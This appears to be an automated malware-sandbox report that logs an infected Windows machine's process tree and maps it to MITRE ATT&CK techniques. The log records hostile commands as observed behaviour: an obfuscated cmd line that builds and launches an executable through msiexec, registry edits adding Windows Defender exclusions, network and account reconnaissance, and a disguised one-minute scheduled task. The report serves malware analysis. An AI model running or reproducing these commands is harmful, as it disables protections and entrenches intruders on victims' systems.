C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = "MZ" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G+ TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q *6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "7⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"7⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y ..\UFTH.2~Z7⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "4F56.exe" -f4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\586F.exeC:\Users\Admin\AppData\Local\Temp\586F.exe1⤵
-
\??\c:\windows\system32\regsvr32.exeregsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"1⤵
-
C:\Windows\SysWOW64\regsvr32.exe-s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\ProgramData\Microsoft\Omaeirficyei" /d "0"4⤵
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Pumao" /d "0"4⤵
-
-
C:\Windows\SysWOW64\whoami.exewhoami /all4⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c set4⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a4⤵
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
-
-
C:\Windows\SysWOW64\net.exenet view /all4⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP4⤵
-
-
C:\Windows\SysWOW64\net.exenet share4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share5⤵
-
-
-
C:\Windows\SysWOW64\route.exeroute print4⤵
-
-
C:\Windows\SysWOW64\netstat.exenetstat -nao4⤵
- Gathers network information
-
-
C:\Windows\SysWOW64\net.exenet localgroup4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup5⤵
-
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe -s "C:\ProgramData\Microsoft\Omaeirficyei\ewdvnymudi.dll"4⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\rvdhvtsC:\Users\Admin\AppData\Roaming\rvdhvts1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
\??\c:\windows\system32\regsvr32.exeregsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"1⤵
-
C:\Windows\SysWOW64\regsvr32.exe-s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\rvdhvtsC:\Users\Admin\AppData\Roaming\rvdhvts1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x23c1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
2File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
5Virtualization/Sandbox Evasion
2Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.6MB
-
Filesize
188KB
-
Filesize
12.2MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
436KB
-
Filesize
116KB
-
Filesize
8KB
-
Filesize
41.7MB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
124KB
-
Filesize
4KB
-
Filesize
140KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
864KB
-
Filesize
1.4MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
692KB
-
Filesize
900KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
72KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
36KB
-
Filesize
856KB
-
Filesize
4.9MB
-
Filesize
696KB
-
Filesize
41.9MB
-
Filesize
41.9MB
-
Filesize
1.3MB
-
Filesize
41.9MB
-
Filesize
41.9MB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
856KB
-
Filesize
4.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
4KB
-
Filesize
16KB
-
Filesize
1.3MB
-
Filesize
68KB
-
Filesize
36KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
80KB
-
Filesize
856KB
-
Filesize
496KB
-
Filesize
4.9MB
-
Filesize
8KB
-
Filesize
304KB
-
Filesize
28KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
188KB
-
Filesize
4.6MB
-
Filesize
4KB
-
Filesize
8KB